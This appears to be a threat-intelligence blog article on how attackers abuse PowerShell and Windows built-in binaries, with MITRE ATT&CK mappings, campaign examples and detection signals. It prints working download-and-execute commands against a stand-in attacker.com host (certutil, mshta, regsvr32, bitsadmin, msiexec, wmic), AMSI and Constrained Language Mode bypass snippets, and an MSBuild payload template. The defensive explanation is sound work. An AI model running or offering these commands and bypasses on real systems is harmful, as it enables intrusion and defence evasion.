PowerShell LOLBAS Offensive Techniques: How Threat Actors Abuse Windows Built-in Binaries

Retool's new app builder is where AI-generated code ships safely
Building apps with AI is easy. Getting them to production safely is another story.
Living off the land is not a new concept, but it has become the dominant tradecraft of sophisticated threat actors for a direct reason: it works. When an attacker uses PowerShell, certutil, or mshta instead of a dropped binary, they are operating entirely within the trust boundaries Windows extends to its own signed binaries. Most endpoint defenses, and almost all perimeter-based controls, have no reliable basis for flagging execution of Microsoft-signed system utilities.
The LOLBAS project catalogs over 150 Windows binaries, scripts, and libraries that threat actors have used in documented intrusions. The techniques are not theoretical. CONTI ransomware operators used wmic and msiexec for lateral movement. APT29 used mshta and certutil for payload staging in multiple espionage campaigns. The SolarWinds intrusion chain used PowerShell encoded commands for command-and-control communication. Lazarus Group's MagicRAT delivery chain used regsvr32 scriptlet execution to avoid dropping detectable executables.
This guide covers the specific PowerShell and LOLBAS offensive techniques documented in threat intelligence: the exact syntax patterns, the MITRE ATT&CK mappings, the bypasses, and the real-world campaigns that operationalized them. Security teams that understand the attacker's toolkit can tune detection logic for what actually happens, not what signature vendors anticipated.
Why PowerShell Remains the Primary LOLBin
PowerShell's dominance as an attacker tool is not accidental. It is the scripting layer with the deepest access to Windows internals: COM objects, WMI, the .NET framework, registry, file system, network stack, and Windows APIs: all accessible without compiling external code.
The canonical PowerShell download cradle is the entry point for most intrusions that use it:
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')
This pattern downloads and executes a remote script in memory without writing to disk. Variations include:
# WebRequest alternative
IEX (Invoke-WebRequest -Uri 'http://attacker.com/payload.ps1' -UseBasicParsing).Content
# COM-based download (bypasses some WebClient blocks)
$w = New-Object -ComObject WScript.Shell
The MITRE ATT&CK technique is T1059.001 (Command and Scripting Interpreter: PowerShell). The sub-techniques that flow from it include T1140 (Deobfuscate/Decode Files or Information) and T1027 (Obfuscated Files or Information) when actors encode their commands.
Encoded command execution is the second most common PowerShell abuse pattern. The -EncodedCommand (alias: -enc) flag accepts a Base64-encoded string and executes it, making the command opaque in process command-line logs:
powershell.exe -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQA...
ExecutionPolicy bypass is near-universal in attacker PowerShell execution. The policy is not a security boundary: it is a safety rail for administrators. Threat actors routinely bypass it with:
powershell.exe -ExecutionPolicy Bypass -File script.ps1
powershell.exe -ep bypass -c "..."
Or by invoking the engine directly through Invoke-Expression or through the .NET hosting API, which bypasses the policy check entirely.
AMSI and Script Block Logging Bypass Techniques
Microsoft introduced two primary PowerShell security controls to counter LOLBAS abuse: the Antimalware Scan Interface (AMSI) and Script Block Logging. Understanding how threat actors bypass them is prerequisite knowledge for defenders trying to close the gap.
AMSI (T1562.001: Impair Defenses: Disable or Modify Tools) hooks into the PowerShell engine to scan script content before execution. Most commodity malware and many nation-state tools attempt to disable it before executing the payload. The most commonly observed bypass patterns in the wild:
Reflection-based AMSI disabling (patching the AmsiScanBuffer function in memory):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') |
?{$_} |
%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}
This reflects into the .NET assembly that hosts the AMSI integration and sets an internal flag that causes AMSI to report initialization failure, effectively disabling it for the current session. Microsoft patches variants of this periodically, and threat actors adapt.
COM object AMSI bypass exploits how AMSI loads into the process space:
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
$b=$a.GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static');
$c=$b.GetValue($null);
[Runtime.InteropServices.Marshal]::WriteInt32([IntPtr]$c,3)
Script Block Logging (enabled via GPO at HKLMSOFTWAREPoliciesMicrosoftWindowsPowerShellScriptBlockLogging) records all executed PowerShell code to the event log (Event ID 4104). Threat actors bypass it using similar reflection techniques to patch System.Management.Automation.Utils's cachedGroupPolicySettings before execution.
Constrained Language Mode (CLM), which restricts PowerShell's capabilities in AppLocker/WDAC-enforced environments, is bypassed by attackers who create a new PowerShell runspace directly through the .NET hosting API:
$r=[runspacefactory]::CreateRunspace()
$r.Open()
$p=[powershell]::Create()
$p.Runspace=$r
$p.AddScript({...}).Invoke()
This launches a new PowerShell engine instance not subject to the CLM restrictions applied to the user's interactive session.
Briefings like this, every morning before 9am.
Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.
Top 8 LOLBins by Threat Actor Frequency: With Specific Abuse Patterns
The LOLBAS project documents the execution, download, and bypass capabilities of each binary. These eight appear most frequently in threat intelligence reporting.
1. certutil.exe (T1140, T1105) Certutil's primary legitimate use is managing certificate stores. Attackers use it to decode Base64-encoded payloads and download remote files:
certutil.exe -decode encoded.b64 payload.exe
certutil.exe -urlcache -split -f http://attacker.com/payload.exe C:\temp\payload.exe
APT41, FIN7, and multiple ransomware affiliates have used certutil for payload staging. Microsoft has added some detection to Defender for the -urlcache pattern, but the decode function remains widely abused.
2. mshta.exe (T1218.005) Mshta executes HTML Application (HTA) files, which are full-trust scripting environments hosted in a legacy Internet Explorer COM component. Remote execution:
mshta.exe http://attacker.com/payload.hta
mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""cmd.exe"")")
Lazarus Group, TA505, and APT32 have operationalized mshta in phishing delivery chains. The HTA file format runs with full scripting trust, making it a reliable code execution vehicle.
3. regsvr32.exe: "Squiblydoo" (T1218.010) The Squiblydoo technique uses regsvr32's ability to register COM scriptlets to execute remote SCT (scriptlet) files:
regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
This technique famously bypasses AppLocker because regsvr32 is a signed Microsoft binary allowed in default AppLocker policies. The network fetch happens inside the regsvr32 process, and the SCT file can contain any JScript or VBScript code.
4. rundll32.exe (T1218.011) Rundll32 calls exported functions from DLLs, including ones written by attackers:
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();...
rundll32.exe shell32.dll,ShellExec_RunDLL cmd.exe
The javascript: URI scheme in rundll32 was used extensively by Dridex and Ursnif banking trojans for fileless execution.
5. bitsadmin.exe (T1197) BITS (Background Intelligent Transfer Service) provides persistent, low-priority file transfer. Attackers use it to download payloads in a way that survives reboots:
bitsadmin /transfer job /download /priority normal http://attacker.com/payload.exe C:\temp\payload.exe
bitsadmin /setnotifycmdline job "cmd.exe" "/c payload.exe"
BITS jobs survive across reboots by default, making this technique useful for establishing a download mechanism that persists even if the initial loader is removed.
6. msiexec.exe (T1218.007) Windows Installer can silently install remote MSI packages:
msiexec.exe /q /i http://attacker.com/payload.msi
msiexec.exe /z http://attacker.com/payload.msi
CONTI operators used msiexec for lateral movement during their 2021 deployment phases, and the technique appeared in the Conti playbook leaked in that year.
7. wmic.exe (T1047) WMI command-line interface enables remote process execution and XSL script execution:
wmic.exe process call create "cmd.exe /c payload.exe"
wmic.exe os get /format:"http://attacker.com/payload.xsl"
The XSL transform technique (T1220) uses wmic's format parameter to fetch and execute a remote XSL file containing JScript or VBScript.
8. msbuild.exe (T1127.001) Microsoft Build Engine can execute inline C# or VB.NET tasks from a project file:
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="exec">
<ClassExec />
</Target>
<UsingTask TaskName="ClassExec" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<ParameterGroup />
<Task>
<Code Type="Class" Language="cs">
<!-- Shellcode or payload here -->
</Code>
</Task>
</UsingTask>
</Project>
MSBuild is signed by Microsoft and typically allowed in application whitelisting policies, making this technique effective in environments with strict execution controls.
Real-World Campaign Examples: LOLBAS in Nation-State and Ransomware Intrusions
Abstract technique descriptions matter less than documented usage in real intrusions. These campaigns confirm that LOLBAS is not theoretical: it is the operational baseline for sophisticated threat actors.
SolarWinds / SUNBURST (2020, APT29 / Cozy Bear) The SolarWinds supply chain compromise used PowerShell extensively in the post-exploitation phase. After the SUNBURST backdoor established initial communication, PowerShell was used to execute the TEARDROP dropper and maintain an encoded C2 channel. The command-line patterns used Base64-encoded commands with ExecutionPolicy bypass to avoid triggering policy-based detection. The attack demonstrated that even in highly monitored environments, PowerShell execution through the legitimate svchost process passes most behavioral baselines.
CONTI Ransomware Operations (2020-2022)
The leaked CONTI playbook revealed a systematic use of LOLBins for lateral movement. The playbook specifically instructs operators to use wmic for remote process execution during the domain enumeration phase, msiexec for deploying the CONTI encryptor to remote systems, and PowerShell for disabling Volume Shadow Copies (vssadmin delete shadows) before encryption. The wmic pattern used is:
wmic /node:[TARGET] process call create "cmd.exe /c [command]"
Lazarus Group / MagicRAT (2022) Cisco Talos documented Lazarus Group's MagicRAT delivery chain using mshta.exe to execute HTA payloads fetched from actor-controlled infrastructure. The chain used a phishing lure that triggered mshta via Windows Script Host, which then used PowerShell to establish persistence via a scheduled task. No external binary was dropped until the final stage, keeping the initial execution chain entirely within Microsoft-signed processes.
Black Basta Ransomware (2022-present)
Black Basta affiliates routinely use certutil for initial payload staging and PowerShell for credential harvesting via a modified version of Mimikatz executed from a download cradle. Post-compromise discovery uses wmic and PowerShell's Get-ADComputer and Get-ADUser cmdlets before deploying the encryptor via PsExec and msiexec to identified targets.
PowerShell Remoting and WinRM as Lateral Movement Vectors
PowerShell Remoting (T1021.006) uses the Windows Remote Management (WinRM) protocol to execute commands on remote systems. In environments where WinRM is enabled: which includes most enterprise environments with Group Policy management: it is effectively a built-in lateral movement channel.
The attacker pattern:
# Execute a command on a remote system
Invoke-Command -ComputerName TARGET -ScriptBlock { whoami; hostname; ipconfig }
# Interactive session
Enter-PSSession -ComputerName TARGET
# Pass-the-hash with alternate credentials
$cred = Get-Credential
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { ... }
WinRM uses port 5985 (HTTP) or 5986 (HTTPS) and authenticates via Kerberos or NTLM. This means valid domain credentials: including those captured via credential dumping (T1003): enable immediate lateral movement without deploying any additional tooling.
The detection challenge is that legitimate PowerShell remoting generates the same event log entries as malicious use. Detection requires behavioral baselines: a finance system suddenly issuing Invoke-Command to twenty servers in the IT department is anomalous; a domain controller doing the same is expected.
Detection Signals and What Security Teams Can Actually Monitor
Understanding the offensive techniques is the prerequisite for building detection that works. The detection logic for each technique follows directly from its execution signature.
PowerShell download cradles: Process creation events for powershell.exe with command-line arguments containing DownloadString, DownloadFile, WebClient, IEX, or Invoke-Expression combined with a URL pattern. Windows Event ID 4104 (Script Block Logging) captures the deobfuscated content: the key is having Script Block Logging enabled before the intrusion.
Encoded commands: PowerShell process creation with -enc or -EncodedCommand in the command line. Legitimate administrative uses of -enc are relatively uncommon; most are automation scripts that could be rewritten without it. High-confidence alert.
certutil download abuse: Process creation for certutil.exe with -urlcache or -decode arguments. The -urlcache -split -f pattern for downloading remote files has no legitimate administrative justification in most environments.
mshta network execution: mshta.exe with a command-line argument containing an HTTP/HTTPS URL. Legitimate mshta execution in enterprise environments is typically local files; remote HTA execution is almost always malicious.
regsvr32 remote scriptlet: regsvr32.exe with /i:http or /i:https in the command line. This pattern has no legitimate use case and can be blocked entirely by WDAC policy.
bitsadmin job creation: bitsadmin.exe with /transfer or /download combined with an external URL, particularly one not matching known software update infrastructure.
For a comprehensive defensive detection guide covering SIEM rules, Windows Event IDs, and endpoint telemetry for each of these signals, see our companion post on detecting living off the land attacks.
The bottom line
PowerShell and LOLBAS offensive techniques are the baseline tradecraft of both nation-state actors and ransomware affiliates because they work inside Windows' own trust model. Understanding the specific execution patterns: certutil download cradles, mshta HTA execution, regsvr32 Squiblydoo, rundll32 JavaScript execution, and bitsadmin persistence: is the prerequisite for writing detection rules that match real intrusions rather than generic behavioral profiles. Enable Script Block Logging (Event ID 4104) and process creation auditing (Event ID 4688 with command-line) as the two highest-leverage log sources before tuning any other detection. Then review your SIEM for the specific command-line patterns documented here.
Frequently asked questions
What is LOLBAS?
LOLBAS stands for Living Off the Land Binaries and Scripts. It refers to the attacker technique of using legitimate, Microsoft-signed Windows system utilities: such as PowerShell, certutil, mshta, regsvr32, and rundll32: to execute malicious code without dropping external binaries. Because these binaries are trusted by the operating system and most security tools, LOLBAS techniques bypass signature-based detection and application allowlisting controls.
Which Windows binaries are most commonly abused by threat actors?
The most frequently abused Windows binaries in documented threat actor campaigns are: PowerShell (T1059.001) for download cradles and lateral movement; certutil (T1140) for decoding payloads and downloading remote files; mshta (T1218.005) for executing HTA scriptlets; regsvr32 (T1218.010) for the Squiblydoo COM scriptlet technique; rundll32 (T1218.011) for DLL and JavaScript execution; bitsadmin (T1197) for persistent download jobs; msiexec (T1218.007) for deploying remote MSI packages; and msbuild (T1127.001) for inline C# task execution.
How do threat actors bypass PowerShell AMSI?
AMSI (Antimalware Scan Interface) is bypassed in the wild primarily through reflection-based techniques that patch the AmsiScanBuffer function in memory, setting internal flags that cause AMSI to report initialization failure for the current PowerShell session. Other methods include using the COM hosting API to create a new PowerShell runspace that does not inherit AMSI bindings, or using string concatenation and variable substitution to prevent AMSI from pattern-matching the bypass string itself before it executes.
What MITRE ATT&CK techniques map to LOLBAS?
Key MITRE ATT&CK techniques for LOLBAS include: T1059.001 (PowerShell), T1218 (System Binary Proxy Execution) covering mshta, regsvr32, rundll32, msiexec, and msbuild sub-techniques, T1197 (BITS Jobs for bitsadmin), T1140 (Deobfuscate/Decode: certutil), T1220 (XSL Script Processing: wmic), T1127.001 (MSBuild inline task execution), and T1021.006 (Remote Services: Windows Remote Management for PowerShell Remoting lateral movement).
How is the PowerShell LOLBAS offensive technique different from Living Off the Land detection?
The offensive perspective focuses on how threat actors construct attack chains: specific command-line patterns, bypass sequences, and LOLBin chaining techniques. The defensive detection perspective focuses on which Windows Event IDs to monitor, how to write SIEM detection rules, and how to configure Script Block Logging and Constrained Language Mode to reduce the attack surface. Both perspectives are needed: understanding the offensive technique precisely is what allows defenders to write detection logic that matches actual attacker behavior rather than hypothetical patterns.
How do threat actors chain multiple LOLBAS techniques together to avoid triggering security tools?
Sophisticated attackers chain LOLBAS techniques so that no single step matches a standalone detection rule. A typical multi-stage chain observed in ransomware campaigns: certutil downloads an encoded payload from a remote URL, mshta executes the decoded HTA script to run a second-stage PowerShell command, PowerShell uses the -EncodedCommand flag to invoke a download cradle that loads Mimikatz reflectively from memory, and wmic establishes persistence via a scheduled task. Each individual binary (certutil, mshta, PowerShell, wmic) is a legitimate Microsoft-signed tool. Detecting the chain requires correlating process parent-child relationships across Event ID 4688 records: certutil spawned by cmd.exe spawned by mshta spawned by a document process is the detection target, not any individual binary invocation. Building detection rules that alert on process lineage rather than individual process names is what separates detections that find real intrusions from those that generate only noise.
Sources & references
Free resources
Critical CVE Reference Card 2025–2026
25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.
Ransomware Incident Response Playbook
Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.
Unsubscribe anytime. We never sell your data.

Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.
Win a $2,495 Black Hat pass.
Full-access to Black Hat USA 2026 in Las Vegas. Subscribe free to enter.
